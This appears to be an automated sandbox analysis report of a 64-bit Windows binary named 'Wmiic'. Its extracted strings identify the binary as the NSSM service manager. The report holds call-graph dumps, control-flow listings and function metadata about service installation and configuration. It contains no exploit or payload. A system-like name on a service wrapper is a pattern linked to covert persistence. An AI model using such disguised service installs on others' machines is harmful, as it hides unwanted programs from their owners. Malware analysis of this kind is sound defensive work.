14001fd3d 17003->17004 17006 14001fda8 17004->17006 17007 14001fe3b 17004->17007 17021 1400197f3 17004->17021 17005 14001fe04 17011 14001fe28 17005->17011 17015 14001fe0d 17005->17015 17006->17005 17009 14001fdca 17006->17009 17006->17021 17012 14001fe5b 17007->17012 17007->17021 17056 140019668 17007->17056 17024 14001e9b8 17009->17024 17047 1400196d0 17011->17047 17018 14001fe95 17012->17018 17012->17021 17059 140019680 17012->17059 17019 14001fdee 17015->17019 17020 14001e118 __CxxFrameHandler 50 API calls 17015->17020 17018->17021 17062 14001f794 17018->17062 17030 14001eca4 17019->17030 17020->17019 17022 14001e118 __CxxFrameHandler 50 API calls 17022->17019 17025 14001e9da 17024->17025 17026 14001e9df 17024->17026 17027 14001e118 __CxxFrameHandler 50 API calls 17025->17027 17028 14001e118 __CxxFrameHandler 50 API calls 17026->17028 17029 14001e9f1 17026->17029 17027->17026 17028->17029 17029->17019 17029->17022 17132 14001ea4c 17030->17132 17033 140019668 __CxxFrameHandler 45 API calls 17034 14001ecde 17033->17034 17035 14001c6a8 _getptd 45 API calls 17034->17035 17045 14001eceb __CxxFrameHandler 17035->17045 17036 14001edef 17037 14001c6a8 _getptd 45 API calls 17036->17037 17038 14001edf4 17037->17038 17040 14001ee02 17038->17040 17041 14001c6a8 _getptd 45 API calls 17038->17041 17039 14001e118 __CxxFrameHandler 50 API calls 17039->17045 17042 14001ee17 __CxxFrameHandler 17040->17042 17043 14001e118 __CxxFrameHandler 50 API calls 17040->17043 17041->17040 17042->17021 17043->17042 17044 140019668 45 API calls __CxxFrameHandler 17044->17045 17045->17036 17045->17039 17045->17044 17136 140019698 17045->17136 17139 14001957c 17047->17139 17051 14001c6a8 _getptd 45 API calls 17052 140019705 17051->17052 17052->17051 17053 140019744 17052->17053 17054 14001eca4 __CxxFrameHandler 50 API calls 17053->17054 17055 140019763 17054->17055 17055->17021 17057 14001c6a8 _getptd 45 API calls 17056->17057 17058 140019671 17057->17058 17058->17012 17060 14001c6a8 _getptd 45 API calls 17059->17060 17061 140019689 17060->17061 17061->17018 17063 14001ea44 __GetUnwindTryBlock 50 API calls 17062->17063 17064 14001f7e7 17063->17064 17065 14001957c __GetUnwindTryBlock 51 API calls 17064->17065 17066 14001f7fc 17065->17066 17150 14001eabc 17066->17150 17069 14001f834 17071 14001eabc __GetUnwindTryBlock 51 API calls 17069->17071 17070 14001f814 __CxxFrameHandler 17153 14001ea80 17070->17153 17072 14001f832 17071->17072 17074 14001e118 __CxxFrameHandler 50 API calls 17072->17074 17080 14001f84d 17072->17080 17074->17080 17075 14001fca4 17076 14001fc41 __CxxFrameHandler 17075->17076 17078 14001fcb4 17075->17078 17079 14001fce8 17075->17079 17077 14001c6a8 _getptd 45 API calls 17076->17077 17081 14001fc7b 17077->17081 17204 14001f550 17078->17204 17083 14001e0f4 __CxxFrameHandler 49 API calls 17079->17083 17080->17075 17084 14001c6a8 _getptd 45 API calls 17080->17084 17087 14001fa0a 17080->17087 17085 14001fc89 17081->17085 17092 14001e118 __CxxFrameHandler 50 API calls 17081->17092 17086 14001fced 17083->17086 17091 14001f891 17084->17091 17085->17021 17221 140023e9c 17086->17221 17087->17075 17088 14001fa48 17087->17088 17090 14001fbcd 17088->17090 17178 1400198fc 17088->17178 17090->17076 17096 140019668 __CxxFrameHandler 45 API calls 17090->17096 17099 14001fbf8 17090->17099 17091->17085 17095 14001c6a8 _getptd 45 API calls 17091->17095 17092->17085 17097 14001f8a3 17095->17097 17096->17099 17098 14001c6a8 _getptd 45 API calls 17097->17098 17101 14001f8af 17098->17101 17099->17076 17100 14001fc0f 17099->17100 17102 140019668 __CxxFrameHandler 45 API calls 17099->17102 17105 14001eea0 __CxxFrameHandler 50 API calls 17100->17105 17156 1400196b4 17101->17156 17102->17100 17103 140019668 __CxxFrameHandler 45 API calls 17122 14001fa81 17103->17122 17106 14001fc26 17105->17106 17106->17076 17109 14001957c __GetUnwindTryBlock 51 API calls 17106->17109 17107 140019680 45 API calls __CxxFrameHandler 17107->17122 17108 14001f8cc __CxxFrameHandler 17111 14001e118 __CxxFrameHandler 50 API calls 17108->17111 17113 14001f8e3 17108->17113 17109->17076 17110 14001f917 17112 14001c6a8 _getptd 45 API calls 17110->17112 17111->17113 17114 14001f91c 17112->17114 17113->17110 17115 14001e118 __CxxFrameHandler 50 API calls 17113->17115 17114->17087 17116 14001c6a8 _getptd 45 API calls 17114->17116 17115->17110 17117 14001f92e 17116->17117 17118 14001c6a8 _getptd 45 API calls 17117->17118 17120 14001f93a 17118->17120 17159 14001eea0 17120->17159 17122->17090 17122->17103 17122->17107 17183 14001eb34 17122->17183 17197 14001f48c 17122->17197 17124 14001f9b3 17125 14001e0f4 __CxxFrameHandler 49 API calls 17124->17125 17126 14001f9b8 __CxxFrameHandler 17125->17126 17169 140023e28 17126->17169 17127 140019668 45 API calls __CxxFrameHandler 17128 14001f94c __CxxFrameHandler 17127->17128 17128->17087 17128->17124 17128->17126 17128->17127 17133 14001ea63 17132->17133 17134 14001ea6e 17132->17134 17135 14001e9b8 __CxxFrameHandler 50 API calls 17133->17135 17134->17033 17135->17134 17137 14001c6a8 _getptd 45 API calls 17136->17137 17138 1400196a6 17137->17138 17138->17045 17140 14001ea44 __GetUnwindTryBlock 50 API calls 17139->17140 17143 1400195b0 17140->17143 17141 140019633 17144 14001ea44 17141->17144 17142 1400195e5 RtlLookupFunctionEntry 17142->17143 17143->17141 17143->17142 17145 14001e9b8 17144->17145 17146 14001e9df 17145->17146 17147 14001e118 __CxxFrameHandler 50 API calls 17145->17147 17148 14001e9f1 17146->17148 17149 14001e118 __CxxFrameHandler 50 API calls 17146->17149 17147->17146 17148->17052 17149->17148 17151 14001957c __GetUnwindTryBlock 51 API calls 17150->17151 17152 14001eacf 17151->17152 17152->17069 17152->17070 17154 14001957c __GetUnwindTryBlock 51 API calls 17153->17154 17155 14001ea9a 17154->17155 17155->17072 17157 14001c6a8 _getptd 45 API calls 17156->17157 17158 1400196c2 17157->17158 17158->17108 17160 14001eec7 17159->17160 17165 14001eed1 17159->17165 17161 14001e118 __CxxFrameHandler 50 API calls 17160->17161 17163 14001eecc 17161->17163 17162 14001ef53 17162->17128 17164 14001e0f4 __CxxFrameHandler 49 API calls 17163->17164 17164->17165 17165->17162 17166 140019680 45 API calls __CxxFrameHandler 17165->17166 17167 140019668 __CxxFrameHandler 45 API calls 17165->17167 17168 14001eb34 __CxxFrameHandler 45 API calls 17165->17168 17166->17165 17167->17165 17168->17165 17170 14001f9e7 17169->17170 17171 140023e4f malloc 17169->17171 17175 140024004 17170->17175 17172 1400206ec malloc 45 API calls 17171->17172 17173 140023e60 17172->17173 17173->17170 17174 140022840 malloc 45 API calls 17173->17174 17174->17170 17177 14002402b __initmbctable 17175->17177 17176 140024072 RaiseException 17176->17087 17177->17176 17179 14001ea44 __GetUnwindTryBlock 50 API calls 17178->17179 17180 140019930 17179->17180 17181 14001e118 __CxxFrameHandler 50 API calls 17180->17181 17182 14001993b 17180->17182 17181->17182 17182->17122 17184 14001eb5f 17183->17184 17186 14001eb67 17183->17186 17185 140019668 __CxxFrameHandler 45 API calls 17184->17185 17185->17186 17187 140019668 __CxxFrameHandler 45 API calls 17186->17187 17189 14001eb86 17186->17189 17195 14001ebe3 __CxxFrameHandler 17186->17195 17187->17189 17188 14001eba2 17191 140019680 __CxxFrameHandler 45 API calls 17188->17191 17189->17188 17190 140019668 __CxxFrameHandler 45 API calls 17189->17190 17189->17195 17190->17188 17192 14001ebb6 17191->17192 17193 14001ebcf 17192->17193 17194 140019668 __CxxFrameHandler 45 API calls 17192->17194 17192->17195 17196 140019680 __CxxFrameHandler 45 API calls 17193->17196 17194->17193 17195->17122 17196->17195 17198 14001957c __GetUnwindTryBlock 51 API calls 17197->17198 17199 14001f4c9 17198->17199 17200 14001f4ef 17199->17200 17227 14001f3dc 17199->17227 17202 140019668 __CxxFrameHandler 45 API calls 17200->17202 17203 14001f4f4 __CxxFrameHandler 17202->17203 17203->17122 17205 14001f581 17204->17205 17206 14001f77c 17204->17206 17207 14001c6a8 _getptd 45 API calls 17205->17207 17206->17076 17208 14001f586 17207->17208 17209 14001f5e6 17208->17209 17210 14001c6a8 _getptd 45 API calls 17208->17210 17209->17206 17211 14001f5f9 17209->17211 17213 14001e118 __CxxFrameHandler 50 API calls 17209->17213 17212 14001f5a5 17210->17212 17214 1400198fc __CxxFrameHandler 50 API calls 17211->17214 17257 14001c534 EncodePointer 17212->17257 17213->17211 17218 14001f62e 17214->17218 17218->17206 17219 140019668 45 API calls __CxxFrameHandler 17218->17219 17220 14001f48c __CxxFrameHandler 51 API calls 17218->17220 17219->17218 17220->17218 17222 140023ec5 malloc 17221->17222 17226 14001fcfe 17221->17226 17223 1400206ec malloc 45 API calls 17222->17223 17222->17226 17224 140023edf 17223->17224 17225 140022840 malloc 45 API calls 17224->17225 17224->17226 17225->17226 17226->17021 17228 14001f3f8 17227->17228 17236 14001f1b4 17228->17236 17230 14001f409 17231 14001f449 17230->17231 17232 14001f40e 17230->17232 17233 140019680 __CxxFrameHandler 45 API calls 17231->17233 17235 14001f421 __AdjustPointer 17231->17235 17234 140019680 __CxxFrameHandler 45 API calls 17232->17234 17232->17235 17233->17235 17234->17235 17235->17200 17237 14001f1e4 17236->17237 17239 14001f1ec 17236->17239 17238 140019668 __CxxFrameHandler 45 API calls 17237->17238 17238->17239 17240 140019668 __CxxFrameHandler 45 API calls 17239->17240 17241 14001f209 17239->17241 17254 14001f269 __AdjustPointer __initmbctable 17239->17254 17240->17241 17242 14001f28d 17241->17242 17246 14001f247 __CxxFrameHandler 17241->17246 17241->17254 17243 14001f2f8 17242->17243 17248 14001f297 __CxxFrameHandler 17242->17248 17244 14001f302 17243->17244 17245 140019680 __CxxFrameHandler 45 API calls 17243->17245 17250 14001f316 __CxxFrameHandler 17244->17250 17253 14001f35b __CxxFrameHandler 17244->17253 17245->17244 17247 14001e118 __CxxFrameHandler 50 API calls 17246->17247 17246->17254 17247->17254 17249 14001e118 __CxxFrameHandler 50 API calls 17248->17249 17248->17254 17249->17254 17251 14001e118 __CxxFrameHandler 50 API calls 17250->17251 17250->17254 17251->17254 17252 14001e118 __CxxFrameHandler 50 API calls 17252->17254 17255 14001f382 __CxxFrameHandler 17253->17255 17256 140019680 __CxxFrameHandler 45 API calls 17253->17256 17254->17230 17255->17252 17255->17254 17256->17255 17276 140023f84 17279 140024b84 17276->17279 17280 14001a91c _lock 45 API calls 17279->17280 17283 140024b97 17280->17283 17285 14001a458 free 45 API calls 17283->17285 17286 140024be0 17283->17286 17287 140024bcb 17283->17287 17284 14001a458 free 45 API calls 17284->17286 17285->17287 17288 14001a81c LeaveCriticalSection 17286->17288 17287->17284 17304 140024d86 17305 140024da2 17304->17305 17306 140024d98 17304->17306 17308 14001a81c LeaveCriticalSection 17306->17308 14918 140018f98 14919 14001a91c _lock 45 API calls 14918->14919 14920 140018fc6 14919->14920 14921 140018fed DecodePointer 14920->14921 14927 1400190a9 _initterm 14920->14927 14923 14001900a DecodePointer 14921->14923 14921->14927 14922 1400190df 14925 14001910a 14922->14925 14936 14001a81c LeaveCriticalSection 14922->14936 14934 14001902e 14923->14934 14927->14922 14939 14001a81c LeaveCriticalSection 14927->14939 14928 1400190f8 14929 140018e0c malloc GetModuleHandleW GetProcAddress 14928->14929 14932 140019100 ExitProcess 14929->14932 14931 14001904d DecodePointer 14938 14001c534 EncodePointer 14931->14938 14934->14927 14934->14931 14935 140019062 DecodePointer DecodePointer 14934->14935 14937 14001c534 EncodePointer 14934->14937 14935->14934 17710 14001c6cc 17711 14001c6d5 17710->17711 17739 14001c7f6 17710->17739 17712 14001c6f0 17711->17712 17713 14001a458 free 45 API calls 17711->17713 17714 14001c6fe 17712->17714 17715 14001a458 free 45 API calls 17712->17715 17713->17712 17716 14001c70c 17714->17716 17717 14001a458 free 45 API calls 17714->17717 17715->17714 17718 14001c71a 17716->17718 17719 14001a458 free 45 API calls 17716->17719 17717->17716 17720 14001c728 17718->17720 17722 14001a458 free 45 API calls 17718->17722 17719->17718 17721 14001c736 17720->17721 17723 14001a458 free 45 API calls 17720->17723 17724 14001c747 17721->17724 17725 14001a458 free 45 API calls 17721->17725 17722->17720 17723->17721 17726 14001c75f 17724->17726 17727 14001a458 free 45 API calls 17724->17727 17725->17724 17728 14001a91c _lock 45 API calls 17726->17728 17727->17726 17730 14001c769 17728->17730 17733 14001a458 free 45 API calls 17730->17733 17734 14001c797 17730->17734 17733->17734 17742 14001a81c LeaveCriticalSection 17734->17742

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 000000014000D2D0 Relevance: 123.1, APIs: 40, Strings: 30, Instructions: 619registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDelete
                                                                                                                                                                                                    • String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppKillProcessTree$AppNoConsole$AppParameters$AppPriority$AppRedirectHook$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateDelay$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStderr$AppStdin$AppStdout$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$AppTimestampLog$Application$CopyAndTruncate$CreationDisposition$FlagsAndAttributes$ShareMode
                                                                                                                                                                                                    • API String ID: 453069226-2212462884
                                                                                                                                                                                                    • Opcode ID: d6f40d484542d60e602315e057a830b834a1cf69aa439974fe36276ad11cd41d
                                                                                                                                                                                                    • Instruction ID: 5f1e44c56ca19a9d09426f40c55942bea94d1b5e1f951be96c332341e708dae6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6f40d484542d60e602315e057a830b834a1cf69aa439974fe36276ad11cd41d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27524AB5214B4281FA66DB27B841BE93361B74D7D8F84512BBF0A076B5DF78CA48C720
                                                                                                                                                                                                    Function 000000014000A2E0 Relevance: 56.3, APIs: 9, Strings: 23, Instructions: 347memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 267 14000a2e0-14000a2f7 call 140001d10 270 14000a2f9 call 140017cc0 267->270 271 14000a2fe-14000a30a call 14000a050 call 140007a90 267->271 270->271 277 14000a317-14000a387 call 140018170 PathQuoteSpacesW GetModuleFileNameW * 2 PathQuoteSpacesW 271->277 278 14000a30c-14000a316 call 140009b30 271->278 283 14000a38d-14000a398 call 140009bf0 277->283 284 14000a73f-14000a752 TlsAlloc 277->284 278->277 294 14000a39a-14000a3ce call 1400194c0 call 140009b30 283->294 295 14000a3cf-14000a3e1 call 140009b50 283->295 285 14000a754 call 14000b870 284->285 286 14000a759-14000a767 GetStdHandle 284->286 285->286 289 14000a7f2-14000a803 call 140009fb0 call 140009b30 286->289 290 14000a76d-14000a79f StartServiceCtrlDispatcherW 286->290 292 14000a7a1-14000a7ac GetLastError 290->292 293 14000a7ea-14000a7f1 call 140009b30 290->293 299 14000a7ae-14000a7bf call 140009fb0 call 140009b30 292->299 300 14000a7c0-14000a7e9 call 140002430 call 1400025f0 call 140009b30 292->300 293->289 294->295 312 14000a3e3-14000a3f8 call 1400129d0 call 140009b30 295->312 313 14000a3f9-14000a40b call 140009b50 295->313 299->300 300->293 312->313 326 14000a426-14000a438 call 140009b50 313->326 327 14000a40d-14000a425 call 1400129d0 call 140009b30 313->327 335 14000a43a-14000a44d call 1400129d0 326->335 336 14000a46d-14000a47f call 140009b50 326->336 327->326 344 14000a457-14000a46c call 1400129d0 call 140009b30 335->344 345 14000a44f-14000a456 call 140009b30 335->345 342 14000a481-14000a499 call 1400129d0 call 140009b30 336->342 343 14000a49a-14000a4ac call 140009b50 336->343 342->343 355 14000a4c7-14000a4d9 call 140009b50 343->355 356 14000a4ae-14000a4c6 call 1400129d0 call 140009b30 343->356 344->336 345->344 364 14000a4f4-14000a506 call 140009b50 355->364 365 14000a4db-14000a4f3 call 1400129d0 call 140009b30 355->365 356->355 373 14000a524-14000a536 call 140009b50 364->373 374 14000a508-14000a523 call 140012550 call 140009b30 364->374 365->364 380 14000a551-14000a563 call 140009b50 373->380 381 14000a538-14000a550 call 1400129d0 call 140009b30 373->381 374->373 389 14000a565-14000a56c 380->389 390 14000a59f-14000a5b1 call 140009b50 380->390 381->380 393 14000a586-14000a599 call 14000b870 call 140013b00 call 140009b30 389->393 394 14000a56e-14000a585 call 14000a180 call 140009b30 389->394 399 14000a5b7-14000a5c9 call 140009b50 390->399 400 14000a6cc-14000a6de call 140010470 390->400 416 14000a59e 393->416 394->393 399->400 413 14000a5cf-14000a5e1 call 140009b50 399->413 411 14000a705-14000a70a 400->411 412 14000a6e0-14000a6e7 400->412 414 14000a736-14000a73e call 140009b30 411->414 415 14000a70c 411->415 412->411 417 14000a6e9-14000a6eb 412->417 413->400 423 14000a5e7-14000a5f9 call 140009b50 413->423 414->284 420 14000a710-14000a734 415->420 416->390 417->411 422 14000a6ed-14000a704 call 14000a180 call 140009b30 417->422 420->414 420->420 422->411 423->400 431 14000a5ff-14000a611 call 140009b50 423->431 431->400 434 14000a617-14000a629 call 140009b50 431->434 434->400 437 14000a62f-14000a641 call 140009b50 434->437 440 14000a643-14000a656 call 140011a80 call 140009b30 437->440 441 14000a657-14000a669 call 140009b50 437->441 440->441 447 14000a66b-14000a67e call 140011db0 call 140009b30 441->447 448 14000a67f-14000a691 call 140009b50 441->448 447->448 448->284 455 14000a697-14000a69e 448->455 457 14000a6b8-14000a6cb call 140012090 call 140009b30 455->457 458 14000a6a0-14000a6b7 call 14000a180 call 140009b30 455->458 457->400 458->457
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ConsoleWindow$Process$FileHandleModuleNameOutputPathQuoteSpaces$AllocCtrlCurrentDispatcherErrorLastServiceStartStationThread_snwprintf_s
                                                                                                                                                                                                    • String ID: %s %s %s %s$2.24-101-g897c7ad$2017-04-26$64-bit$NSSM$continue$dump$edit$get$install$list$pause$processes$remove$reset$restart$rotate$set$start$status$statuscode$stop$unset
                                                                                                                                                                                                    • API String ID: 3367203220-1867080860
                                                                                                                                                                                                    • Opcode ID: 0cc89f18b1057b5a72a2ee583f9768e88b6792957dfbdf81a853be53e10b8232
                                                                                                                                                                                                    • Instruction ID: 475713a89709ce93db3c9404fee735fe112960effc50d923b9116429dcfb75de
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cc89f18b1057b5a72a2ee583f9768e88b6792957dfbdf81a853be53e10b8232
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E16CB0600A4686FB16FB73F9657E923A1EB497D8F404426BB194B2F6EF78C945C340
                                                                                                                                                                                                    Function 0000000140020A2C Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 468COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 467 140020a2c-140020a6f call 140024ca0 470 140020a71-140020a73 467->470 471 140020a78-140020a7b 467->471 472 14002115f-140021189 call 140018800 470->472 473 140020aab-140020adc 471->473 474 140020a7d-140020a9e call 14001b8dc call 14001b8bc call 14001b7ec 471->474 477 140020ae4-140020aeb 473->477 478 140020ade-140020ae2 473->478 492 140020aa3-140020aa6 474->492 477->474 481 140020aed-140020af3 477->481 478->477 478->481 483 140020b02-140020b0b call 1400215f8 481->483 484 140020af5-140020afd call 1400213d4 481->484 490 140020b11-140020b22 483->490 491 140020e02-140020e13 483->491 484->483 490->491 493 140020b28-140020b58 call 14001c6a8 GetConsoleMode 490->493 494 1400210e3-1400210ff WriteFile 491->494 495 140020e19-140020e21 491->495 492->472 493->491 506 140020b5e-140020b60 493->506 497 140021101-140021105 494->497 498 14002110c-140021112 GetLastError 494->498 499 140020ef7-140020efb 495->499 500 140020e27-140020e2a 495->500 497->498 508 140021119-140021120 call 14001b8fc 498->508 502 140020f01-140020f04 499->502 503 140020fd5-140020fd8 499->503 504 14002112c-140021136 500->504 505 140020e30 500->505 502->504 509 140020f0a 502->509 503->504 507 140020fde 503->507 510 140021143-140021156 call 14001b8bc call 14001b8dc 504->510 511 140021138-14002113d 504->511 512 140020e33-140020e40 505->512 515 140020b62-140020b65 506->515 516 140020b6b-140020b7f GetConsoleCP 506->516 517 140020fe4-140020fe9 507->517 508->492 519 140020f0f-140020f1c 509->519 510->492 511->470 511->510 513 140020e42-140020e4a 512->513 520 140020e72-140020eb3 WriteFile 513->520 521 140020e4c-140020e54 513->521 515->491 515->516 524 140020b85-140020b8a 516->524 525 140020dfc-140020e00 516->525 523 140020feb-140020ff3 517->523 527 140020f1e-140020f26 519->527 531 140020eb5-140020ecc 520->531 532 140020eea-140020ef2 GetLastError 520->532 528 140020e61-140020e70 521->528 529 140020e56-140020e5e 521->529 533 140021023-14002106c WideCharToMultiByte 523->533 534 140020ff5-140021001 523->534 535 140020b8f-140020b92 524->535 536 140020da3-140020da5 525->536 537 140020f28-140020f34 527->537 538 140020f59-140020f9a WriteFile 527->538 528->513 528->520 529->528 543 140020ed2-140020edf 531->543 544 140020d97-140020d9d 531->544 532->544 549 140020df2-140020dfa GetLastError 533->549 550 140021072 533->550 545 140021003-14002100b 534->545 546 14002100f-140021021 534->546 547 140020b98-140020bbb 535->547 548 140020d1b-140020d1f 535->548 539 140021125 536->539 540 140020dab-140020dae 536->540 551 140020f45-140020f57 537->551 552 140020f36-140020f41 537->552 538->532 541 140020fa0-140020fb7 538->541 539->504 540->508 554 140020db4-140020dc6 call 14001b8bc call 14001b8dc 540->554 541->544 555 140020fbd-140020fca 541->555 543->512 560 140020ee5 543->560 544->536 553 14002115b-14002115d 544->553 545->546 546->523 546->533 561 140020bdd-140020be7 call 140021a2c 547->561 562 140020bbd-140020bdb 547->562 558 140020d21-140020d25 548->558 559 140020d27-140020d3a 548->559 556 140020d92 549->556 557 140021074-1400210ac WriteFile 550->557 551->527 551->538 552->551 553->472 554->492 555->519 565 140020fd0 555->565 556->544 568 1400210b9-1400210bf GetLastError 557->568 569 1400210ae-1400210b5 557->569 558->559 563 140020d3e-140020d42 558->563 559->563 560->544 577 140020be9-140020bf6 561->577 578 140020c1d-140020c23 561->578 566 140020c26-140020c33 call 1400219dc 562->566 574 140020d44-140020d48 563->574 575 140020d4a-140020d59 call 140024344 563->575 565->544 587 140020c39-140020c75 WideCharToMultiByte 566->587 588 140020d8e 566->588 573 1400210c1-1400210c4 568->573 569->557 572 1400210b7 569->572 572->573 573->556 579 1400210ca-1400210d8 573->579 574->575 580 140020d80-140020d88 574->580 575->549 592 140020d5f-140020d65 575->592 584 140020dcb-140020df0 577->584 585 140020bfc-140020c12 call 1400219dc 577->585 578->566 579->517 589 1400210de 579->589 580->535 580->588 584->544 585->588 597 140020c18-140020c1b 585->597 587->588 593 140020c7b-140020caa WriteFile 587->593 588->556 589->556 592->580 596 140020d67-140020d78 call 140024344 592->596 593->549 595 140020cb0-140020cbd 593->595 595->588 599 140020cc3-140020ccb 595->599 596->549 602 140020d7a-140020d7c 596->602 597->587 599->580 600 140020cd1-140020d06 WriteFile 599->600 600->549 603 140020d0c-140020d11 600->603 602->580 603->588 604 140020d13-140020d19 603->604 604->580
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                    • API String ID: 921712934-4171548499
                                                                                                                                                                                                    • Opcode ID: 74c5f7fb8baae198cacb24aad5bbcbe68e136ebc3b0815143d4b2bb7719c7451
                                                                                                                                                                                                    • Instruction ID: 76fb5729cbaa013820f51bb000bfef4f3fcad7bac76d669b73782e902e55697a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74c5f7fb8baae198cacb24aad5bbcbe68e136ebc3b0815143d4b2bb7719c7451
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3712023220478586EB228F66E4443EEB7A1F38CBC4F55411AFB8947AB6DB3DD945CB00
                                                                                                                                                                                                    Function 0000000140012160 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 220memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 605 140012160-140012173 606 140012182-1400121c0 605->606 607 140012175-140012181 605->607 608 1400121c2-1400121c5 606->608 609 1400121d7 606->609 610 1400121c7-1400121cd 608->610 611 1400121cf-1400121d5 608->611 612 1400121dd-1400121ea 609->612 610->612 611->612 613 1400121ec-140012208 call 140018170 612->613 614 14001220d-14001222b 612->614 613->614 616 140012231-140012246 call 140001140 614->616 617 14001238d-140012390 614->617 624 140012367-140012379 call 140001780 616->624 625 14001224c-140012277 GetProcessHeap HeapAlloc 616->625 619 140012392-140012399 617->619 620 1400123a1-1400123b1 call 140001a60 617->620 619->620 626 1400123b3-1400123b6 620->626 627 1400123bb-1400123ca call 140001ad0 620->627 638 14001237b-140012382 624->638 639 14001235d-140012362 624->639 628 1400122a3-1400122ba call 140018230 625->628 629 140012279-14001229e call 140017f4c call 1400026b0 625->629 631 1400122bc-14001230e ChangeServiceConfigW 626->631 627->631 645 1400123d0-1400123d8 627->645 628->631 646 14001251b-140012548 629->646 641 140012314-14001231c 631->641 642 140012413-14001241b 631->642 638->620 648 140012384-14001238b 638->648 639->646 643 140012337-140012358 GetLastError call 140002430 call 140017f4c call 1400026b0 641->643 644 14001231e-140012331 GetProcessHeap HeapFree 641->644 649 140012436-14001243d 642->649 650 14001241d-140012430 GetProcessHeap HeapFree 642->650 643->639 644->643 654 1400123f3-14001240e call 140017f4c call 1400026b0 645->654 655 1400123da-1400123ed GetProcessHeap HeapFree 645->655 648->620 651 14001245e-14001246a 649->651 652 14001243f-140012458 call 14000f500 649->652 650->649 659 140012471-14001247c call 14000fce0 651->659 660 14001246c-14001246f 651->660 652->639 652->651 654->646 655->654 664 140012481-1400124b0 ChangeServiceConfig2W 659->664 660->659 660->664 668 1400124e2-1400124e5 664->668 669 1400124b2-1400124bb GetLastError 664->669 674 1400124e7-1400124ee call 14000d2d0 668->674 675 140012519 668->675 669->668 672 1400124bd-1400124dd call 140002430 call 1400025f0 